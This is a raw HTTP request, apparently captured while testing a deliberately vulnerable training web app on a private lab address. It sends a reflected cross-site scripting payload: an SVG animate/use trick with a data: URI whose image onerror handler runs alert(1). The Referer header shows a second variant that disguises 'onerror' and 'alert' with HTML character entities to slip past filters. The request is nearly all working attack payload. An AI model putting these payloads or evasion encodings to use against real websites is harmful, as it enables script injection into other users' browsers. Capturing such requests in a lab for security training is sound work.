GET /vulnerabilities/xss_r/?name=%3Csvg%3E%3Canimate+xlink%3Ahref%3D%22%23x%22+attributeName%3D%22href%22+values%3D%22data%3Aimage%2Fsvg%2Bxml%2C%26lt%3Bsvg+id%3D%27x%27+xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%26gt%3B%26lt%3Bimage+href%3D%271%27+onerror%3D%27alert%281%29%27+%2F%26gt%3B%26lt%3B%2Fsvg%26gt%3B%23x%22+%2F%3E%3Cuse+id%3Dx+%2F%3E HTTP/1.1
Host: 10.10.3.128:2280
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3Csvg%3E%3Cuse+href%3D%22data%3Aimage%2Fsvg%2Bxml%2C%26lt%3Bsvg+id%3D%27x%27+xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%26gt%3B%26lt%3Bimage+href%3D%271%27+%26%23111%3B%26%23110%3Berror%3D%27%26%2397%3Blert%281%29%27+%2F%26gt%3B%26lt%3B%2Fsvg%26gt%3B%23x%22+%2F%3E
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

